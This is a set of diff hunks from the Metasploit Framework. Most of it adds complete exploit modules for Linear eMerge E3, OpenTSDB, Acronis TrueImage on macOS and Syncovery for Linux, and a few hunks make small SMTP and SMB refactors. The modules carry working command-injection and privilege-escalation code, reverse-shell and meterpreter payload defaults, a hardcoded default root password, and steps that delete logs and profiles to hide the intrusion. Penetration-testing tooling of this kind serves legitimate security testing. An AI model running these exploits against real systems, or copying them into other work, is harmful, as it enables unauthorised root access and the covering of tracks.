        print_good(pretty_tbl.to_s) if datastore['ShowFiles']
        subdirs.shift
@@ -293,7 +295,9 @@ class MetasploitModule < Msf::Auxiliary
      begin
        print_status 'Starting module'
        if rport == SMB1_PORT
-          connect(versions: [1])
+          # force library in smb1 mode otherwise simple.client is a
+          # `Rex::Proto::SMB::Client` that does not supply `net_share_enum_all`
+          connect(versions: [1], backend: :ruby_smb)
        else
          connect(versions: [1, 2, 3])
        end
@@ -82,19 +82,19 @@ class MetasploitModule < Msf::Auxiliary
    begin
      connect

-      res = smtp_send_recv("EHLO X\r\n")
+      res = raw_send_recv("EHLO X\r\n")
      vprint_status("#{res.inspect}")

-      res = smtp_send_recv("#{mailfrom}\r\n")
+      res = raw_send_recv("#{mailfrom}\r\n")
      vprint_status("#{res.inspect}")

-      res = smtp_send_recv("#{mailto}\r\n")
+      res = raw_send_recv("#{mailto}\r\n")
      vprint_status("#{res.inspect}")

-      res = smtp_send_recv("DATA\r\n")
+      res = raw_send_recv("DATA\r\n")
      vprint_status("#{res.inspect}")

-      res = smtp_send_recv("#{Rex::Text.rand_text_alpha(rand(10)+5)}\r\n.\r\n")
+      res = raw_send_recv("#{Rex::Text.rand_text_alpha(rand(10)+5)}\r\n.\r\n")
      vprint_status("#{res.inspect}")

      if res =~ /250/
@@ -96,30 +96,26 @@ class MetasploitModule < Msf::Exploit::Remote
  # we use a regex for the version number
  #
  def check
-    # we want to handle cases where the port/target isn't open/listening gracefully
-    begin
-      # only catch the response if we're going to use it, in this case we do for the version
-      # detection.
-      res = send_request_cgi(
-        'uri' => normalize_uri(target_uri.path, 'index.php'),
-        'method' => 'GET'
-      )
-      # gracefully handle if res comes back as nil, since we're not guaranteed a response
-      # also handle if we get an unexpected HTTP response code
-      return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
-      return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code == 200
+    # only catch the response if we're going to use it, in this case we do for the version
+    # detection.
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'GET'
+    )
+    # gracefully handle if res comes back as nil, since we're not guaranteed a response
+    # also handle if we get an unexpected HTTP response code
+    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code == 200

-      # here we're looking through html for the version string, similar to:
-      # Version 1.2
-      %r{Version: (?<version>\d{1,2}\.\d{1,2})</td>} =~ res.body
+    # here we're looking through html for the version string, similar to:
+    # Version 1.2
+    %r{Version: (?<version>\d{1,2}\.\d{1,2})</td>} =~ res.body

-      if version && Rex::Version.new(version) <= Rex::Version.new('1.3')
-        vprint_good("Version Detected: #{version}")
-        CheckCode::Appears
-      end
-    rescue ::Rex::ConnectionError
-      return CheckCode::Unknown("#{peer} - Could not connect to web service")
+    if version && Rex::Version.new(version) <= Rex::Version.new('1.3')
+      vprint_good("Version Detected: #{version}")
+      CheckCode::Appears
    end
+
    CheckCode::Safe
  end

@@ -0,0 +1,133 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/stopwatch'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Linear eMerge E3-Series Access Controller Command Injection',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in the Linear eMerge
+          E3-Series Access Controller. The Linear eMerge E3 versions `1.00-06` and below are vulnerable
+          to unauthenticated command injection in card_scan_decoder.php via the  `No` and `door` HTTP GET parameter.
+          Successful exploitation results in command execution as the `root` user.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Gjoko Krstic <gjoko[at]applied-risk.com>', # Discovery
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor
+        ],
+        'References' => [
+          [ 'CVE', '2019-7256'],
+          [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],
+          [ 'URL', 'https://na.niceforyou.com/' ],
+          [ 'URL', 'https://attackerkb.com/topics/8WUJkci8N4/cve-2019-7256' ],
+          [ 'EDB', '47649'],
+          [ 'PACKETSTORM', '155256']
+        ],
+        'DisclosureDate' => '2019-10-29',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_ARMLE],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('ROOT_PASSWORD', [ true, 'default root password on a vulnerable Linear eMerge E3-Series access controller', 'davestyle']),
+      ]
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    random_no = rand(30..100)
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'card_scan_decoder.php'),
+      'vars_get' =>
+        {
+          'No' => random_no,
+          'door' => "`echo #{datastore['ROOT_PASSWORD']}|su -c \"#{cmd}\"`"
+        }
+    })
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
+  end
+
+  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    sleep_time = rand(2..10)
+    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
+    res, elapsed_time = Rex::Stopwatch.elapsed_time do
+      execute_command("sleep #{sleep_time}")
+    end
+
+    return CheckCode::Unknown('No response received from the target!') unless res
+    return CheckCode::Safe('Target is not affected by this vulnerability.') unless res.code == 200 && !res.body.blank? && res.body =~ /"card_format_default":"/
+
+    print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")
+    return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time
+
+    CheckCode::Vulnerable('Successfully tested command injection.')
+  end
+
+  def exploit
+    case target['Type']
+    when :unix_cmd
+      print_status("Executing #{target.name} with #{payload.encoded}")
+      # Don't check the response here since the server won't respond
+      # if the payload is successfully executed.
+      execute_command(payload.encoded)
+    when :linux_dropper
+      print_status("Executing #{target.name}")
+      execute_cmdstager(linemax: 262144)
+    end
+  end
+end
@@ -0,0 +1,248 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'OpenTSDB 2.4.0 unauthenticated command injection',
+        'Description' => %q{
+          This module exploits an unauthenticated command injection
+          vulnerability in the yrange parameter in OpenTSDB through
+          2.4.0 (CVE-2020-35476) in order to achieve unauthenticated
+          remote code execution as the root user.
+
+          The module first attempts to obtain the OpenTSDB version via
+          the api. If the version is 2.4.0 or lower, the module
+          performs additional checks to obtain the configured metrics
+          and aggregators. It then randomly selects one metric and one
+          aggregator and uses those to instruct the target server to
+          plot a graph. As part of this request, the yrange parameter is
+          set to the payload, which will then be executed by the target
+          if the latter is vulnerable.
+
+          This module has been successfully tested against OpenTSDB
+          version 2.3.0.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Shai rod', # @nightrang3r - discovery and PoC
+          'Erik Wynter' # @wyntererik - Metasploit
+        ],
+        'References' => [
+          ['CVE', '2020-35476'],
+          ['URL', 'https://github.com/OpenTSDB/opentsdb/issues/2051'] # disclosure and PoC
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 4242
+        },
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'CmdStagerFlavor' => %w[bourne curl wget],
+        'Targets' => [
+          [
+            'Automatic (Unix In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+              'Type' => :unix_memory
+            }
+          ],
+          [
+            'Automatic (Linux Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            }
+          ]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2020-11-18',
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options [
+      OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']),
+    ]
+  end
+
+  def check
+    # sanity check to see if the target is likely OpenTSDB
+    res1 = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    unless res1
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenTSDB')
+      return CheckCode::Safe('Target is not an OpenTSDB application.')
+    end
+
+    # get the version via the api
+    res2 = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'version')
+    })
+
+    unless res2
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    unless res2.code == 200 && res2.body.include?('version')
+      return CheckCode::Detected('Target may be OpenTSDB but the version could not be determined.')
+    end
+
+    begin
+      parsed_res_body = JSON.parse(res2.body)
+    rescue JSON::ParserError
+      return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')
+    end
+
+    unless parsed_res_body.is_a?(Hash) && parsed_res_body.key?('version')
+      return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')
+    end
+
+    version = parsed_res_body['version']
+
+    begin
+      if Rex::Version.new(version) <= Rex::Version.new('2.4.0')
+        return CheckCode::Appears("The target is OpenTSDB version #{version}")
+      else
+        return CheckCode::Safe("The target is OpenTSDB version #{version}")
+      end
+    rescue ArgumentError => e
+      return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}")
+    end
+  end
+
+  def select_metric
+    # check if any metrics have been configured. if not, exploitation cannot work
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'suggest'),
+      'vars_get' => { 'type' => 'metrics' }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed.')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured metrics")
+    end
+
+    begin
+      metrics = JSON.parse(res.body)
+    rescue JSON::ParserError
+      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain valid JSON.')
+    end
+
+    unless metrics.is_a?(Array)
+      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain a JSON array')
+    end
+
+    if metrics.empty?
+      fail_with(Failure::NoTarget, 'Failed to identify any configured metrics. This makes exploitation impossible')
+    end
+
+    # select a random metric since any will do
+    @metric = metrics.sample
+    print_status("Identified #{metrics.length} configured metrics. Using metric #{@metric}")
+  end
+
+  def select_aggregator
+    # check the configured aggregators and select one at random
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'aggregators')
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed.')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured aggregators")
+    end
+
+    begin
+      aggregators = JSON.parse(res.body)
+    rescue JSON::ParserError
+      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain valid JSON.')
+    end
+
+    unless aggregators.is_a?(Array)
+      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain a JSON array')
+    end
+
+    if aggregators.empty?
+      fail_with(Failure::NoTarget, 'Failed to identify any configured aggregators. This makes exploitation impossible')
+    end
+
+    # select a random aggregator since any will do
+    @aggregator = aggregators.sample
+    print_status("Identified #{aggregators.length} configured aggregators. Using aggregator #{@aggregator}")
+  end
+
+  def execute_command(cmd, _opts = {})
+    # use base64 to avoid special char escape hell (specifying BadChars did not help)
+    cmd = "'echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/sh'"
+    start_time = rand(20.year.ago..10.year.ago) # this should be a date far enough in the past to make sure we capture all possible data
+    start_value = start_time.strftime('%Y/%m/%d-%H:%M:%S')
+    end_time = rand(1.year.since..10.year.since) # this can be a date in the future to make sure we capture all possible data
+    end_value = end_time.strftime('%Y/%m/%d-%H:%M:%S')
+
+    get_vars = {
+      'start' => start_value,
+      'end' => end_value,
+      'm' => "#{@aggregator}:#{@metric}",
+      'yrange' => "[1:system(#{Rex::Text.uri_encode(cmd)})]",
+      'wxh' => "#{rand(800..1600)}x#{rand(400..600)}",
+      'style' => 'linespoint'
+    }
+
+    exploit_uri = '?'
+    get_vars.each do |key, value|
+      exploit_uri += "#{key}=#{value}&"
+    end
+    exploit_uri += 'json'
+
+    # using a raw request because cgi was leading to encoding issues
+    send_request_raw({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'q' + exploit_uri)
+    }, 0) # we don't have to wait for a reply here
+  end
+
+  def exploit
+    select_metric
+    select_aggregator
+    if target.arch.first == ARCH_CMD
+      print_status('Executing the payload')
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(background: true)
+    end
+  end
+end
@@ -149,7 +149,7 @@ class MetasploitModule < Msf::Exploit::Remote
    end

    ehlo = datastore['EHLO']
-    ehlo_resp = smtp_send_recv("EHLO #{ehlo}\r\n")
+    ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
    ehlo_resp.each_line do |line|
      print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")
    end
@@ -165,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Remote
    from << "@#{ehlo}"
    to   = datastore['MAILTO']

-    resp = smtp_send_recv("MAIL FROM: #{from}\r\n")
+    resp = raw_send_recv("MAIL FROM: #{from}\r\n")
    resp ||= 'no response'
    msg = "MAIL: #{resp.strip}"
    if not resp or resp[0,3] != '250'
@@ -174,7 +174,7 @@ class MetasploitModule < Msf::Exploit::Remote
      print_status("#{rhost}:#{rport} - #{msg}")
    end

-    resp = smtp_send_recv("RCPT TO: #{to}\r\n")
+    resp = raw_send_recv("RCPT TO: #{to}\r\n")
    resp ||= 'no response'
    msg = "RCPT: #{resp.strip}"
    if not resp or resp[0,3] != '250'
@@ -183,7 +183,7 @@ class MetasploitModule < Msf::Exploit::Remote
      print_status("#{rhost}:#{rport} - #{msg}")
    end

-    resp = smtp_send_recv("DATA\r\n")
+    resp = raw_send_recv("DATA\r\n")
    resp ||= 'no response'
    msg = "DATA: #{resp.strip}"
    if not resp or resp[0,3] != '354'
@@ -196,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Remote
    message <<  "\r\n"
    message << ".\r\n"

-    resp = smtp_send_recv(message)
+    resp = raw_send_recv(message)
    msg = "DELIVER: #{resp.strip}"
    if not resp or resp[0,3] != '250'
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
@@ -181,7 +181,7 @@ class MetasploitModule < Msf::Exploit::Remote
  def exploit
    validate_configuration!
    if datastore['HTTP_HEADER'].blank?
-      targetinfo = (@checkcode&.details || []).reject { |ti| ti[:headers]&.empty? }.first
+      targetinfo = (@checkcode&.details || []).reject { |ti| ti[:headers].blank? }.first
      http_header = targetinfo[:headers].keys.first if targetinfo
      fail_with(Failure::BadConfig, 'No HTTP_HEADER was specified and none were found automatically') unless http_header

@@ -0,0 +1,179 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Common
+  include Msf::Post::Process
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Acronis TrueImage XPC Privilege Escalation',
+        'Description' => %q{
+          Acronis TrueImage versions 2019 update 1 through 2021 update 1
+          are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`
+          helper tool does not perform any validation on connecting clients,
+          which gives arbitrary clients the ability to execute functions provided
+          by the helper tool with `root` privileges.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Csaba Fitzl', # @theevilbit - Vulnerability Discovery
+          'Shelby Pace' # Metasploit Module and Objective-c code
+        ],
+        'Platform' => [ 'osx' ],
+        'Arch' => [ ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' => [
+          [ 'CVE', '2020-25736' ],
+          [ 'URL', 'https://kb.acronis.com/content/68061' ],
+          [ 'URL', 'https://attackerkb.com/topics/a1Yrvagxt5/cve-2020-25736' ]
+        ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp',
+          'WfsDelay' => 15
+        },
+        'DisclosureDate' => '2020-11-11',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('WRITABLE_DIR', [ true, 'Writable directory to write the payload to', '/tmp' ]),
+      OptString.new('SHELL', [ true, 'Shell to use for executing payload', '/bin/zsh' ]),
+      OptEnum.new('COMPILE', [ true, 'Compile exploit on target', 'Auto', [ 'Auto', 'True', 'False' ] ])
+    ])
+  end
+
+  def tmp_dir
+    datastore['WRITABLE_DIR'].to_s
+  end
+
+  def sys_shell
+    datastore['SHELL'].to_s
+  end
+
+  def compile
+    datastore['COMPILE']
+  end
+
+  def compile_on_target?
+    return false if compile == 'False'
+
+    if compile == 'Auto'
+      ret = cmd_exec('xcode-select -p')
+      return false if ret.include?('error: unable')
+    end
+
+    true
+  end
+
+  def exp_file_name
+    @exp_file_name ||= Rex::Text.rand_text_alpha(5..10)
+  end
+
+  def check
+    helper_location = '/Library/PrivilegedHelperTools'
+    helper_svc_names = [ 'com.acronis.trueimagehelper', 'com.acronis.helpertool' ]
+    plist = '/Applications/Acronis True Image.app/Contents/Info.plist'
+
+    unless helper_svc_names.any? { |svc_name| file?("#{helper_location}/#{svc_name}") }
+      return CheckCode::Safe
+    end
+
+    return CheckCode::Detected('Service found, but cannot determine version via plist') unless file?(plist)
+
+    plutil_cmd = "plutil -extract CFBundleVersion raw \'#{plist}\'"
+    build_no = cmd_exec(plutil_cmd)
+    return CheckCode::Detected('Could not retrieve build number from plist') if build_no.blank?
+
+    build_no = build_no.to_i
+    vprint_status("Found build #{build_no}")
+    return CheckCode::Appears('Vulnerable build found') if build_no > 14170 && build_no < 33610
+
+    CheckCode::Safe('Acronis version found is not vulnerable')
+  end
+
+  def exploit
+    payload_name = Rex::Text.rand_text_alpha(7)
+    @payload_path = "#{tmp_dir}/#{payload_name}"
+
+    print_status("Attempting to write payload at #{@payload_path}")
+    unless upload_and_chmodx(@payload_path, generate_payload_exe)
+      fail_with(Failure::BadConfig, 'Failed to write payload. Consider changing WRITABLE_DIR option.')
+    end
+    vprint_good("Successfully wrote payload at #{@payload_path}")
+
+    @pid = get_valid_pid
+    exp_bin_path = "#{tmp_dir}/#{exp_file_name}"
+
+    if compile_on_target?
+      exp_src = "#{exp_file_name}.m"
+      exp_path = "#{tmp_dir}/#{exp_src}"
+      compile_cmd = "gcc -framework Foundation #{exp_path} -o #{exp_bin_path}"
+
+      unless write_file(exp_path, objective_c_code)
+        fail_with(Failure::BadConfig, 'Failed to write Objective-C exploit to disk. WRITABLE_DIR may need to be changed')
+      end
+      register_files_for_cleanup(@payload_path, exp_path, exp_bin_path)
+
+      ret = cmd_exec(compile_cmd)
+      fail_with(Failure::UnexpectedReply, "Failed to compile #{exp_src}") unless ret.blank?
+
+      print_status("Successfully compiled #{exp_src}...Now executing payload")
+    else
+      print_status("Using pre-compiled exploit #{exp_bin_path}")
+      compiled_exploit = compiled_exp
+      unless upload_and_chmodx(exp_bin_path, compiled_exploit)
+        fail_with(Failure::BadConfig, 'Failed to write compiled exploit. Consider changing WRITABLE_DIR option.')
+      end
+
+      register_files_for_cleanup(exp_bin_path, @payload_path)
+    end
+
+    cmd_exec(exp_bin_path)
+  end
+
+  def objective_c_code
+    file_contents = exploit_data('CVE-2020-25736', 'acronis-exp.erb')
+    ERB.new(file_contents).result(binding)
+  rescue Errno::ENOENT
+    fail_with(Failure::NotFound, 'ERB payload file not found')
+  end
+
+  def compiled_exp
+    compiled = exploit_data('CVE-2020-25736', 'acronis-exp.macho')
+    compiled.gsub!('/tmp/payload', @payload_path)
+    compiled.gsub!('/bin/zsh', sys_shell)
+    compiled.gsub!("\xEF\xBE\xAD\xDE".force_encoding('ASCII-8BIT'), [@pid.to_i].pack('V'))
+
+    compiled
+  end
+
+  def get_valid_pid
+    procs = get_processes
+    return '1' if procs.empty?
+
+    len = procs.length
+    rand_proc = procs[rand(1...len)]
+    return '1' if rand_proc['pid'].to_s.blank?
+
+    rand_proc['pid'].to_s
+  end
+end
@@ -0,0 +1,234 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'json'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Syncovery For Linux Web-GUI Authenticated Remote Command Execution',
+        'Description' => %q{
+          This module exploits an authenticated command injection vulnerability in the Web GUI of Syncovery File Sync & Backup Software for Linux.
+          Successful exploitation results in remote code execution under the context of the root user.
+
+          Syncovery allows an authenticated user to create jobs, which are executed before/after a profile is run.
+          Jobs can contain arbitrary system commands and will be executed as root.
+          A valid username and password or a session token is needed to exploit the vulnerability.
+          The profile and its log file will be deleted afterwards to disguise the attack.
+
+          The vulnerability is known to work on Linux platforms. All Syncovery versions prior to v9.48j are vulnerable including all versions of branch 8.
+        },
+        'Author' => [ 'Jan Rude' ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/'],
+          ['CVE', '2022-36534']
+        ],
+        'Platform' => 'unix',
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          ['Syncovery for Linux < 9.48j', {}]
+        ],
+        'Privileged' => true,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        },
+        'DisclosureDate' => '2022-09-06',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8999), # Default is HTTP: 8999; HTTPS: 8943
+        OptString.new('USERNAME', [true, 'The username to Syncovery (default: default)', 'default']),
+        OptString.new('PASSWORD', [true, 'The password to Syncovery (default: pass)', 'pass']),
+        OptString.new('TOKEN', [false, 'A valid session token', '']),
+        OptString.new('TARGETURI', [true, 'The path to Syncovery', '/']),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/get_global_variables'),
+      'method' => 'GET'
+    )
+
+    if res && res.code == 200
+      json_res = res.get_json_document
+      if json_res['isSyncoveryWindows'] == 'false'
+        version = json_res['SyncoveryTitle']&.scan(/Syncovery\s([A-Za-z0-9.]+)/)&.flatten&.first || ''
+        if version.empty?
+          vprint_warning("#{peer} - Could not identify version")
+          Exploit::CheckCode::Detected
+        elsif Rex::Version.new(version) < Rex::Version.new('9.48j') || Rex::Version.new(version) == Rex::Version.new('9.48')
+          vprint_good("#{peer} - Syncovery #{version}")
+          Exploit::CheckCode::Appears
+        else
+          vprint_status("#{peer} - Syncovery #{version}")
+          Exploit::CheckCode::Safe
+        end
+      else
+        Exploit::CheckCode::Safe
+      end
+    else
+      Exploit::CheckCode::Unknown
+    end
+  end
+
+  def exploit
+    @token = datastore['TOKEN']
+    if @token.blank?
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, '/post_applogin.php'),
+        'vars_get' => {
+          'login' => datastore['USERNAME'].to_s,
+          'password' => datastore['PASSWORD'].to_s
+        },
+        'method' => 'GET'
+      })
+
+      unless res
+        fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request")
+      end
+
+      # After login, the application should give us a new token
+      # session_token is actually just base64(MM/dd/yyyy HH:mm:ss) at the time of the login
+      json_res = res.get_json_document
+      @token = json_res['session_token']
+      if @token.present?
+        vprint_good("#{peer} - Login successful")
+      else
+        fail_with(Failure::NoAccess, "#{peer} - Invalid credentials!")
+      end
+    end
+
+    # send payload
+    @profile_name = Rex::Text.rand_text_alpha_lower(20)
+    json_body = {
+      'ProfileName' => @profile_name,
+      'Action' => 'Insert',
+      'FormName' => 'synapp_profile_editor_form',
+      'token' => @token,
+      'Name' => @profile_name,
+      'LeftPath' => '/dev/null',
+      'LeftPathDisplay' => '/dev/null',
+      'RightPath' => '/dev/null',
+      'RightPathDisplay' => '/dev/null',
+      'Job_ExecuteBefore' => payload.encoded
+    }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/post_profilesettings.php'),
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest',
+        'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8'
+      },
+      'data' => JSON.generate(json_body)
+    })
+
+    if res && res.code == 200
+      if res.body.to_s.include? 'Session Expired'
+        fail_with(Failure::UnexpectedReply, "#{peer} - Invalid token (Session Expired)")
+      elsif res.body.to_s.include? 'Inserted'
+        vprint_good("#{peer} - Profile created")
+      else
+        fail_with(Failure::UnexpectedReply, "#{peer} - Error (#{res.body})")
+      end
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Error (response code: #{res.code})")
+    end
+
+    vprint_status("#{peer} - Running profile")
+    json_body = {
+      'ProfileName' => @profile_name,
+      'token' => @token,
+      'attended' => true
+    }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/post_runprofile.php'),
+      'data' => JSON.generate(json_body)
+    })
+
+    if res && res.code == 200
+      print_good("#{peer} - Exploit successfully executed")
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not run profile (response code: #{res.code})")
+    end
+  end
+
+  def on_new_session(session)
+    # Delete profile to disguise attack in Web GUI
+    vprint_status("#{peer} - Trying to delete IOCs")
+    json_body = {
+      'ProfileName' => @profile_name,
+      'token' => @token
+    }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/post_deleteprofile.php'),
+      'data' => JSON.generate(json_body)
+    })
+
+    if res && res.code == 200 && (res.body.to_s.include? 'Deleted')
+      vprint_good("#{peer} - Profile successfully deleted")
+    else
+      print_error("#{peer} - Could not delete profile (#{res.body})")
+    end
+
+    # Remove IOC by deleting log files
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/getprogram_settings.php'),
+      'vars_get' => {
+        'token' => @token
+      }
+    )
+
+    if res && res.code == 200
+      json_res = res.get_json_document
+      if json_res['LogPath'].present?
+        log_path = json_res['LogPath']
+      end
+    end
+
+    # Request log files
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/logfiles.json'),
+      'vars_get' => {
+        'pagenum' => 0,
+        'pagesize' => 1
+      },
+      'headers' => {
+        'token' => @token
+      }
+    })
+
+    if res && res.code == 200
+      log_file = res.body.scan(/#{@profile_name}.*?\.log/)&.flatten&.first || ''
+      register_file_for_cleanup("#{log_path}/#{log_file}")
+    else
+      register_dirs_for_cleanup(log_path.to_s)
+    end
+
+    super
+  end
+end
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
      fail_with(Failure::Unknown, "Warning: This version of Exim is not exploitable")
    end

-    ehlo_resp = smtp_send_recv("EHLO #{ehlo}\r\n")
+    ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
